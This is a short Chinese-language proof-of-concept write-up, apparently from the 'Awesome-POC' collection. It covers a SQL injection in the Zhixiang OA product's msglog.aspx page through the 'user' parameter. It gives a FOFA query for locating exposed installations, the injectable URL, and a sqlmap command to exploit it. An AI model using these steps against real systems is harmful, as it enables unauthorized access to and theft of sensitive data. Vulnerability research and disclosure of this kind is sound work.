Awesome-POC/OA产品漏洞/致翔OA msglog.aspx SQL注入漏洞.md

37 lines
582 B
Markdown
Raw Normal View History

2022-05-20 15:57:09 +08:00
# 致翔OA msglog.aspx SQL注入漏洞
## 漏洞描述
致翔OA msglog.aspx文件存在SQL注入漏洞攻击者通过漏洞可获取敏感信息
## 漏洞影响
```
致翔OA
```
## FOFA
```
app="致翔软件-致翔OA"
```
## 漏洞复现
产品页面
2022-12-05 11:09:28 +08:00
![image-20220520142109952](./images/202205201421236.png)
2022-05-20 15:57:09 +08:00
存在漏洞的文件为 `msglog.aspx`,涉及注入的参数为 user
```
/mainpage/msglog.aspx?user=1
```
SQLMap跑一下
```
sqlmap -u http://127.0.0.1/mainpage/msglog.aspx?user=1 -p user --batch
```
2022-12-05 11:09:28 +08:00
![image-20220520142130999](./images/202205201421211.png)